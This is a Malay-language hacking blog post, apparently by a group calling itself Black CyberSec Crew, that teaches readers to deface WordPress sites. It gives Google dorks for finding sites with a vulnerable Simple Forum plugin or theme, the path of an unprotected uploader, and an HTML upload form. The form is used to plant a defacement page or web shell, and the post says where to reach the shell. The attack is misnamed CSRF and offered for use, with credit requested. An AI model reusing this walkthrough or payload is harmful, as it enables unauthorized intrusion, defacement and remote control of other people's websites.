Assalamualaikum dan selamat malam :)
Harini aku nak ajar korang cara deface laman web menggunakan cara CSRF .
APAKAH ITU CSRF ?
CSRF bermaksud Cross Site Request Forgery
Ok jom belajar xD
Macam biasa , korang masukkan dork ni dekat google search :
inurl:/plugins/simple-forum/
inurl:/wp-content/themes/shepard
inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico
Lepas dah search . Korang ambik mana website dekat search tu dan tambah
/resources/jscript/ajaxupload/sf-uploader.php
dekat belakang site tu contoh :
www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php
Dah ?
Kalau dah nanti dia akan keluar tulisan error . Kalau keluar tulisan access denied korang carilah laman web lain =)
Sekarang . Korang bukak notepad dan copy poc ni :
<form enctype="multipart/form-data"
action="www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Save poc tu dengan nama CSRF.html .
Yang warna biru tu korang padam dan letak link laman web vuln yang korang jumpa tadi tu .
Bila korang bukak poc tu nanti dia akan keluar form upload . Jadi , upload lah deface korang ataupun shell korang =)
Nak tahu shell korang upload letak ni dekat belakang site.com :
/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php
Ok , Enjoy !!
Jangan lupa creditkan Black CyberSec Crew kalau berjaya nanti =)
Rating:
100%
based on 10 ratings.
5 user reviews.
0 comments:
Post a Comment